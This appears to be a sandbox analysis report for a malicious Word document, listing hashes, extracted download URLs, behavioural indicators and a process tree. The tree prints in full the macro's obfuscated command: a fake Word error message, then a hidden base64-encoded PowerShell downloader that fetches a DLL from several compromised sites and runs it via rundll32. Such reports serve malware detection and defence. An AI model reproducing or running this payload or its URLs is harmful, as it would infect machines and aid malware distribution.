Analysis
-
max time kernel
135s -
max time network
143s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
13-01-2021 14:50
Static task
static1
Behavioral task
behavioral1
Sample
file.doc
Resource
win7v20201028
Behavioral task
behavioral2
Sample
file.doc
Resource
win10v20201028
General
-
Target
file.doc
-
Size
159KB
-
MD5
91d36bdc24320509824ce981e2b947a1
-
SHA1
68efe300bc46a826218fcb9c48020d4fdb1328f1
-
SHA256
b2bf6fd741c90c1f70e56a46a458aad5889596863ff687083039e9a2afcd6c09
-
SHA512
df701cf581514eba7d7b85df13f793a5df52fd885c29debfae51fe2e27aa8766ef815747a88d43d620bf2effb0fab05ecfbb158b17ae910bc7e50c35feac7138
Malware Config
Extracted
http://ketorecipesfit.com/wp-admin/afanv/
http://mertelofis.com/wp-content/As0/
http://givingthanksdaily.com/CP/
http://datawyse.net/0X3QY/
http://cs.lcxxny.com/wp-includes/E3U8nn/
http://makiyazhdoma.ru/blocked/tgEeW8M/
http://trustseal.enamad.ir.redshopfa.com/admit/wJJvvG/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4300 4356 cmd.exe -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exerundll32.exeflow pid process 14 532 powershell.exe 28 3168 rundll32.exe 33 3168 rundll32.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 1200 rundll32.exe -
Drops file in System32 directory 1 IoCs
Processes:
rundll32.exedescription ioc process File opened for modification C:\Windows\SysWOW64\Dgobe\oytl.kqr rundll32.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 4800 WINWORD.EXE 4800 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exerundll32.exepid process 532 powershell.exe 532 powershell.exe 532 powershell.exe 3168 rundll32.exe 3168 rundll32.exe 3168 rundll32.exe 3168 rundll32.exe 3168 rundll32.exe 3168 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 532 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 4800 WINWORD.EXE 4800 WINWORD.EXE 4800 WINWORD.EXE 4800 WINWORD.EXE 4800 WINWORD.EXE 4800 WINWORD.EXE 4800 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
cmd.exepowershell.exerundll32.exerundll32.exedescription pid process target process PID 4300 wrote to memory of 4444 4300 cmd.exe msg.exe PID 4300 wrote to memory of 4444 4300 cmd.exe msg.exe PID 4300 wrote to memory of 532 4300 cmd.exe powershell.exe PID 4300 wrote to memory of 532 4300 cmd.exe powershell.exe PID 532 wrote to memory of 1124 532 powershell.exe rundll32.exe PID 532 wrote to memory of 1124 532 powershell.exe rundll32.exe PID 1124 wrote to memory of 1200 1124 rundll32.exe rundll32.exe PID 1124 wrote to memory of 1200 1124 rundll32.exe rundll32.exe PID 1124 wrote to memory of 1200 1124 rundll32.exe rundll32.exe PID 1200 wrote to memory of 3168 1200 rundll32.exe rundll32.exe PID 1200 wrote to memory of 3168 1200 rundll32.exe rundll32.exe PID 1200 wrote to memory of 3168 1200 rundll32.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\file.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4800
-
C:\Windows\system32\cmd.execmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc cwBlAHQALQBWAEEAUgBJAEEAYgBMAGUAIAAgAG4AaQA5ADcARAAgACAAKAAgACAAWwBUAFkAcABlAF0AKAAiAHsANQB9AHsAMAB9AHsAMgB9AHsAMQB9AHsANAB9AHsAMwB9ACIAIAAtAEYAJwB0AEUAJwAsACcAUgBFACcALAAnAG0ALgBpAG8ALgBEAEkAJwAsACcATwBSAFkAJwAsACcAYwB0ACcALAAnAHMAWQBzACcAKQApACAAOwBTAGUAVAAtAEkAVABlAG0AIAAgACgAIgBWAGEAIgArACIAUgBpACIAKwAiAEEAYgBMAEUAOgBrAGgAMAAiACsAIgB6AHEAeQAiACkAIAAgACgAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANwB9AHsANgB9AHsAMwB9AHsANAB9AHsANQB9AHsAMQB9ACIALQBGACAAJwBzAFkAcwBUAEUAJwAsACcARQBSACcALAAnAE0ALgBOACcALAAnAFMARQAnACwAJwByAHYAaQBjAGUAcABPAGkAbgB0ACcALAAnAG0AQQBuAGEAZwAnACwAJwAuACcALAAnAEUAVAAnACkAIAApACAAIAA7ACQAWgB1AGwANAA1AHAAdgA9ACQAQQA3ADUAUAAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAVQAyADQAQgA7ACQASgA2ADMARgA9ACgAJwBBAF8AJwArACcAOQBKACcAKQA7ACAAIAAkAG4ASQA5ADcARAA6ADoAIgBDAHIARQBgAEEAYABUAGUARABpAGAAUgBFAGMAdABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHQAJwArACcAZAAnACsAKAAnAFkAJwArACcAQgB2AHYAJwApACsAJwBqACcAKwAnAG4AZQAnACsAJwBlAHQAJwArACgAJwBkAFkARwAnACsAJwBoACcAKwAnAHEAcQBxAGcAdgB0AGQAJwApACsAJwBZACcAKQAuACIAUgBgAEUAYABQAGwAYQBjAGUAIgAoACgAJwB0ACcAKwAnAGQAWQAnACkALAAnAFwAJwApACkAKQA7ACQASQAwADkARQA9ACgAKAAnAEsAJwArACcANQAxACcAKQArACcAWAAnACkAOwAgACQAawBIADAAegBRAHkAOgA6ACIAUwBgAGUAQwBVAHIAYABpAHQAYAB5AFAAUgBPAFQATwBDAE8ATAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARwAwAF8AQgA9ACgAJwBFAF8AJwArACcAMQBMACcAKQA7ACQASQA5AG0AeABoAG0AcwAgAD0AIAAoACcASwA0ACcAKwAnADIATgAnACkAOwAkAFAAOAAxAEIAPQAoACcATgA4ACcAKwAnADkAWQAnACkAOwAkAEwAdAB4AHAAaQA5AGUAPQAkAEgATwBNAEUAKwAoACgAKAAnAEMAJwArACcATQA0AEIAdgB2AGoAbgAnACsAJwBlAGUAQwAnACsAJwBNACcAKQArACcANABHACcAKwAnAGgAJwArACgAJwBxAHEAJwArACcAcQBnACcAKQArACcAdgBDACcAKwAnAE0ANAAnACkALgAiAFIAYABlAHAAbABBAGAAQwBlACIAKAAoACcAQwAnACsAJwBNADQAJwApACwAJwBcACcAKQApACsAJABJADkAbQB4AGgAbQBzACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABFADAAMwBVAD0AKAAoACcASwAyACcAKwAnADUAJwApACsAJwBBACcAKQA7ACQARQBmADMAMwBzADQAcQA9ACgAJwBBACcAKwAoACcAXQBbAHEAWwBEACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBrAGUAdABvACcAKQArACcAcgAnACsAKAAnAGUAJwArACcAYwBpACcAKQArACcAcABlACcAKwAoACcAcwBmAGkAdAAnACsAJwAuACcAKwAnAGMAbwBtAC8AdwBwACcAKQArACgAJwAtACcAKwAnAGEAZAAnACkAKwAnAG0AJwArACcAaQAnACsAJwBuACcAKwAnAC8AJwArACgAJwBhAGYAYQAnACsAJwBuACcAKQArACcAdgAvACcAKwAoACcAQAAnACsAJwBBAF0AJwApACsAKAAnAFsAcQAnACsAJwBbAEQAOgAnACkAKwAnAC8AJwArACgAJwAvAG0AZQAnACsAJwByACcAKQArACgAJwB0ACcAKwAnAGUAbABvAGYAaQBzACcAKQArACcALgAnACsAJwBjACcAKwAoACcAbwAnACsAJwBtAC8AdwAnACkAKwAoACcAcAAtACcAKwAnAGMAbwAnACkAKwAnAG4AJwArACgAJwB0ACcAKwAnAGUAbgAnACkAKwAoACcAdAAvACcAKwAnAEEAJwApACsAJwBzACcAKwAoACcAMAAvAEAAJwArACcAQQBdACcAKwAnAFsAJwApACsAJwBxAFsAJwArACcARAA6ACcAKwAoACcALwAnACsAJwAvAGcAaQAnACkAKwAoACcAdgBpACcAKwAnAG4AJwApACsAJwBnACcAKwAoACcAdABoAGEAJwArACcAbgBrAHMAJwApACsAKAAnAGQAYQAnACsAJwBpACcAKQArACgAJwBsAHkALgBjAG8AJwArACcAbQAnACsAJwAvAEMAUAAvACcAKQArACgAJwBAAEEAJwArACcAXQAnACkAKwAoACcAWwAnACsAJwBxACcAKwAnAFsARAA6AC8ALwBkAGEAdAAnACsAJwBhAHcAeQAnACkAKwAnAHMAZQAnACsAKAAnAC4AbgAnACsAJwBlACcAKQArACcAdAAvACcAKwAoACcAMABYADMAUQAnACsAJwBZACcAKQArACcALwBAACcAKwAoACcAQQBdACcAKwAnAFsAcQBbACcAKQArACgAJwBEADoALwAvAGMAJwArACcAcwAnACkAKwAoACcALgBsAGMAeAB4AG4AeQAnACsAJwAuACcAKQArACgAJwBjACcAKwAnAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAnAC0AaQAnACsAKAAnAG4AYwAnACsAJwBsACcAKQArACgAJwB1AGQAJwArACcAZQBzACcAKwAnAC8AJwArACcARQAzACcAKwAnAFUAOABuAG4ALwBAAEEAXQAnACsAJwBbAHEAWwBEADoAJwArACcALwAnACsAJwAvAG0AJwApACsAKAAnAGEAJwArACcAawBpACcAKQArACcAeQAnACsAKAAnAGEAegBoACcAKwAnAGQAJwApACsAKAAnAG8AbQAnACsAJwBhAC4AcgAnACsAJwB1ACcAKQArACcALwAnACsAJwBiACcAKwAoACcAbABvAGMAawBlACcAKwAnAGQAJwArACcALwB0AGcAJwApACsAJwBFAGUAJwArACcAVwAnACsAKAAnADgATQAnACsAJwAvACcAKQArACgAJwBAAEEAJwArACcAXQBbAHEAJwArACcAWwBEADoALwAvACcAKQArACcAdAAnACsAKAAnAHIAJwArACcAdQBzAHQAcwAnACsAJwBlAGEAbAAuAGUAbgAnACkAKwAoACcAYQAnACsAJwBtAGEAZAAuACcAKwAnAGkAcgAnACkAKwAoACcALgByACcAKwAnAGUAZAAnACkAKwAnAHMAaAAnACsAKAAnAG8AcAAnACsAJwBmAGEALgBjACcAKwAnAG8AbQAvAGEAJwApACsAKAAnAGQAbQAnACsAJwBpAHQAJwArACcALwB3AEoASgB2AHYARwAvACcAKQApAC4AIgByAEUAcABsAEEAYABDAGUAIgAoACgAKAAnAEEAJwArACcAXQBbAHEAJwApACsAJwBbAEQAJwApACwAKABbAGEAcgByAGEAeQBdACgAKAAnAGQAcwAnACsAKAAnAGUAdwAnACsAJwBmACcAKQApACwAKAAoACcAdwBlACcAKwAnAHYAJwApACsAJwB3AGUAJwApACkALAAoACgAJwBhAGUAJwArACcAZgAnACkAKwAnAGYAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACkAWwAyAF0AKQAuACIAcwBwAGAATABpAFQAIgAoACQATwA3ADMATAAgACsAIAAkAFoAdQBsADQANQBwAHYAIAArACAAJABBAF8ANABDACkAOwAkAEEAOAAzAEsAPQAoACgAJwBVADQAJwArACcAXwAnACkAKwAnAE0AJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABRAHYAdABuAGQAdgBfACAAaQBuACAAJABFAGYAMwAzAHMANABxACkAewB0AHIAeQB7ACgAJgAoACcATgAnACsAJwBlAHcALQBPAGIAagAnACsAJwBlAGMAdAAnACkAIABTAFkAUwBUAEUATQAuAG4AZQBUAC4AVwBFAEIAYwBsAGkAZQBOAFQAKQAuACIAZABPAHcATgBgAEwATwBBAGQAYABGAEkATABFACIAKAAkAFEAdgB0AG4AZAB2AF8ALAAgACQATAB0AHgAcABpADkAZQApADsAJABOADEAMQBDAD0AKAAoACcASQAnACsAJwA5ADMAJwApACsAJwBLACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABMAHQAeABwAGkAOQBlACkALgAiAGwARQBuAGAAZwBgAFQAaAAiACAALQBnAGUAIAA0ADYAOAA1ADUAKQAgAHsAJgAoACcAcgB1ACcAKwAnAG4AZABsAGwAJwArACcAMwAyACcAKQAgACQATAB0AHgAcABpADkAZQAsACgAJwBTACcAKwAoACcAaAAnACsAJwBvACcAKwAnAHcARABpAGEAbAAnACkAKwAoACcAbwBnACcAKwAnAEEAJwApACkALgAiAHQAbwBzAFQAYABSAGkAYABOAGcAIgAoACkAOwAkAFgAMgBfAEYAPQAoACcATAA3ACcAKwAnADIASwAnACkAOwBiAHIAZQBhAGsAOwAkAEwAOAA4AFgAPQAoACcAUQAwACcAKwAnADcARwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEYAXwA2AEMAPQAoACgAJwBOADIAJwArACcAMAAnACkAKwAnAFAAJwApAA==1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4300 -
C:\Windows\system32\msg.exemsg Admin /v Word experienced an error trying to open the file.2⤵PID:4444
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -enc cwBlAHQALQBWAEEAUgBJAEEAYgBMAGUAIAAgAG4AaQA5ADcARAAgACAAKAAgACAAWwBUAFkAcABlAF0AKAAiAHsANQB9AHsAMAB9AHsAMgB9AHsAMQB9AHsANAB9AHsAMwB9ACIAIAAtAEYAJwB0AEUAJwAsACcAUgBFACcALAAnAG0ALgBpAG8ALgBEAEkAJwAsACcATwBSAFkAJwAsACcAYwB0ACcALAAnAHMAWQBzACcAKQApACAAOwBTAGUAVAAtAEkAVABlAG0AIAAgACgAIgBWAGEAIgArACIAUgBpACIAKwAiAEEAYgBMAEUAOgBrAGgAMAAiACsAIgB6AHEAeQAiACkAIAAgACgAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANwB9AHsANgB9AHsAMwB9AHsANAB9AHsANQB9AHsAMQB9ACIALQBGACAAJwBzAFkAcwBUAEUAJwAsACcARQBSACcALAAnAE0ALgBOACcALAAnAFMARQAnACwAJwByAHYAaQBjAGUAcABPAGkAbgB0ACcALAAnAG0AQQBuAGEAZwAnACwAJwAuACcALAAnAEUAVAAnACkAIAApACAAIAA7ACQAWgB1AGwANAA1AHAAdgA9ACQAQQA3ADUAUAAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAVQAyADQAQgA7ACQASgA2ADMARgA9ACgAJwBBAF8AJwArACcAOQBKACcAKQA7ACAAIAAkAG4ASQA5ADcARAA6ADoAIgBDAHIARQBgAEEAYABUAGUARABpAGAAUgBFAGMAdABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHQAJwArACcAZAAnACsAKAAnAFkAJwArACcAQgB2AHYAJwApACsAJwBqACcAKwAnAG4AZQAnACsAJwBlAHQAJwArACgAJwBkAFkARwAnACsAJwBoACcAKwAnAHEAcQBxAGcAdgB0AGQAJwApACsAJwBZACcAKQAuACIAUgBgAEUAYABQAGwAYQBjAGUAIgAoACgAJwB0ACcAKwAnAGQAWQAnACkALAAnAFwAJwApACkAKQA7ACQASQAwADkARQA9ACgAKAAnAEsAJwArACcANQAxACcAKQArACcAWAAnACkAOwAgACQAawBIADAAegBRAHkAOgA6ACIAUwBgAGUAQwBVAHIAYABpAHQAYAB5AFAAUgBPAFQATwBDAE8ATAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARwAwAF8AQgA9ACgAJwBFAF8AJwArACcAMQBMACcAKQA7ACQASQA5AG0AeABoAG0AcwAgAD0AIAAoACcASwA0ACcAKwAnADIATgAnACkAOwAkAFAAOAAxAEIAPQAoACcATgA4ACcAKwAnADkAWQAnACkAOwAkAEwAdAB4AHAAaQA5AGUAPQAkAEgATwBNAEUAKwAoACgAKAAnAEMAJwArACcATQA0AEIAdgB2AGoAbgAnACsAJwBlAGUAQwAnACsAJwBNACcAKQArACcANABHACcAKwAnAGgAJwArACgAJwBxAHEAJwArACcAcQBnACcAKQArACcAdgBDACcAKwAnAE0ANAAnACkALgAiAFIAYABlAHAAbABBAGAAQwBlACIAKAAoACcAQwAnACsAJwBNADQAJwApACwAJwBcACcAKQApACsAJABJADkAbQB4AGgAbQBzACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABFADAAMwBVAD0AKAAoACcASwAyACcAKwAnADUAJwApACsAJwBBACcAKQA7ACQARQBmADMAMwBzADQAcQA9ACgAJwBBACcAKwAoACcAXQBbAHEAWwBEACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBrAGUAdABvACcAKQArACcAcgAnACsAKAAnAGUAJwArACcAYwBpACcAKQArACcAcABlACcAKwAoACcAcwBmAGkAdAAnACsAJwAuACcAKwAnAGMAbwBtAC8AdwBwACcAKQArACgAJwAtACcAKwAnAGEAZAAnACkAKwAnAG0AJwArACcAaQAnACsAJwBuACcAKwAnAC8AJwArACgAJwBhAGYAYQAnACsAJwBuACcAKQArACcAdgAvACcAKwAoACcAQAAnACsAJwBBAF0AJwApACsAKAAnAFsAcQAnACsAJwBbAEQAOgAnACkAKwAnAC8AJwArACgAJwAvAG0AZQAnACsAJwByACcAKQArACgAJwB0ACcAKwAnAGUAbABvAGYAaQBzACcAKQArACcALgAnACsAJwBjACcAKwAoACcAbwAnACsAJwBtAC8AdwAnACkAKwAoACcAcAAtACcAKwAnAGMAbwAnACkAKwAnAG4AJwArACgAJwB0ACcAKwAnAGUAbgAnACkAKwAoACcAdAAvACcAKwAnAEEAJwApACsAJwBzACcAKwAoACcAMAAvAEAAJwArACcAQQBdACcAKwAnAFsAJwApACsAJwBxAFsAJwArACcARAA6ACcAKwAoACcALwAnACsAJwAvAGcAaQAnACkAKwAoACcAdgBpACcAKwAnAG4AJwApACsAJwBnACcAKwAoACcAdABoAGEAJwArACcAbgBrAHMAJwApACsAKAAnAGQAYQAnACsAJwBpACcAKQArACgAJwBsAHkALgBjAG8AJwArACcAbQAnACsAJwAvAEMAUAAvACcAKQArACgAJwBAAEEAJwArACcAXQAnACkAKwAoACcAWwAnACsAJwBxACcAKwAnAFsARAA6AC8ALwBkAGEAdAAnACsAJwBhAHcAeQAnACkAKwAnAHMAZQAnACsAKAAnAC4AbgAnACsAJwBlACcAKQArACcAdAAvACcAKwAoACcAMABYADMAUQAnACsAJwBZACcAKQArACcALwBAACcAKwAoACcAQQBdACcAKwAnAFsAcQBbACcAKQArACgAJwBEADoALwAvAGMAJwArACcAcwAnACkAKwAoACcALgBsAGMAeAB4AG4AeQAnACsAJwAuACcAKQArACgAJwBjACcAKwAnAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAnAC0AaQAnACsAKAAnAG4AYwAnACsAJwBsACcAKQArACgAJwB1AGQAJwArACcAZQBzACcAKwAnAC8AJwArACcARQAzACcAKwAnAFUAOABuAG4ALwBAAEEAXQAnACsAJwBbAHEAWwBEADoAJwArACcALwAnACsAJwAvAG0AJwApACsAKAAnAGEAJwArACcAawBpACcAKQArACcAeQAnACsAKAAnAGEAegBoACcAKwAnAGQAJwApACsAKAAnAG8AbQAnACsAJwBhAC4AcgAnACsAJwB1ACcAKQArACcALwAnACsAJwBiACcAKwAoACcAbABvAGMAawBlACcAKwAnAGQAJwArACcALwB0AGcAJwApACsAJwBFAGUAJwArACcAVwAnACsAKAAnADgATQAnACsAJwAvACcAKQArACgAJwBAAEEAJwArACcAXQBbAHEAJwArACcAWwBEADoALwAvACcAKQArACcAdAAnACsAKAAnAHIAJwArACcAdQBzAHQAcwAnACsAJwBlAGEAbAAuAGUAbgAnACkAKwAoACcAYQAnACsAJwBtAGEAZAAuACcAKwAnAGkAcgAnACkAKwAoACcALgByACcAKwAnAGUAZAAnACkAKwAnAHMAaAAnACsAKAAnAG8AcAAnACsAJwBmAGEALgBjACcAKwAnAG8AbQAvAGEAJwApACsAKAAnAGQAbQAnACsAJwBpAHQAJwArACcALwB3AEoASgB2AHYARwAvACcAKQApAC4AIgByAEUAcABsAEEAYABDAGUAIgAoACgAKAAnAEEAJwArACcAXQBbAHEAJwApACsAJwBbAEQAJwApACwAKABbAGEAcgByAGEAeQBdACgAKAAnAGQAcwAnACsAKAAnAGUAdwAnACsAJwBmACcAKQApACwAKAAoACcAdwBlACcAKwAnAHYAJwApACsAJwB3AGUAJwApACkALAAoACgAJwBhAGUAJwArACcAZgAnACkAKwAnAGYAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACkAWwAyAF0AKQAuACIAcwBwAGAATABpAFQAIgAoACQATwA3ADMATAAgACsAIAAkAFoAdQBsADQANQBwAHYAIAArACAAJABBAF8ANABDACkAOwAkAEEAOAAzAEsAPQAoACgAJwBVADQAJwArACcAXwAnACkAKwAnAE0AJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABRAHYAdABuAGQAdgBfACAAaQBuACAAJABFAGYAMwAzAHMANABxACkAewB0AHIAeQB7ACgAJgAoACcATgAnACsAJwBlAHcALQBPAGIAagAnACsAJwBlAGMAdAAnACkAIABTAFkAUwBUAEUATQAuAG4AZQBUAC4AVwBFAEIAYwBsAGkAZQBOAFQAKQAuACIAZABPAHcATgBgAEwATwBBAGQAYABGAEkATABFACIAKAAkAFEAdgB0AG4AZAB2AF8ALAAgACQATAB0AHgAcABpADkAZQApADsAJABOADEAMQBDAD0AKAAoACcASQAnACsAJwA5ADMAJwApACsAJwBLACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABMAHQAeABwAGkAOQBlACkALgAiAGwARQBuAGAAZwBgAFQAaAAiACAALQBnAGUAIAA0ADYAOAA1ADUAKQAgAHsAJgAoACcAcgB1ACcAKwAnAG4AZABsAGwAJwArACcAMwAyACcAKQAgACQATAB0AHgAcABpADkAZQAsACgAJwBTACcAKwAoACcAaAAnACsAJwBvACcAKwAnAHcARABpAGEAbAAnACkAKwAoACcAbwBnACcAKwAnAEEAJwApACkALgAiAHQAbwBzAFQAYABSAGkAYABOAGcAIgAoACkAOwAkAFgAMgBfAEYAPQAoACcATAA3ACcAKwAnADIASwAnACkAOwBiAHIAZQBhAGsAOwAkAEwAOAA4AFgAPQAoACcAUQAwACcAKwAnADcARwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEYAXwA2AEMAPQAoACgAJwBOADIAJwArACcAMAAnACkAKwAnAFAAJwApAA==2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:532 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\Bvvjnee\Ghqqqgv\K42N.dll,ShowDialogA3⤵
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\Bvvjnee\Ghqqqgv\K42N.dll,ShowDialogA4⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1200 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Dgobe\oytl.kqr",ShowDialogA5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:3168
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
243287780c929262b5d9c379a19904ec
SHA1705334b3167e9462ca0f73a3d62160f91fde8352
SHA2566333233cb0872c95dc9bdf60f11b7df7ed35cd1f5780534ba6aa19e7be7a6cee
SHA512edf58018995d904665c82aee90c40a2e086f08f3c842a9bc2c5a9c673c6d9ad48cf5ce9c1c80ab9ecb91bf511e33eb19d4dcc3a25cb578a96380535b564076f5
-
MD5
243287780c929262b5d9c379a19904ec
SHA1705334b3167e9462ca0f73a3d62160f91fde8352
SHA2566333233cb0872c95dc9bdf60f11b7df7ed35cd1f5780534ba6aa19e7be7a6cee
SHA512edf58018995d904665c82aee90c40a2e086f08f3c842a9bc2c5a9c673c6d9ad48cf5ce9c1c80ab9ecb91bf511e33eb19d4dcc3a25cb578a96380535b564076f5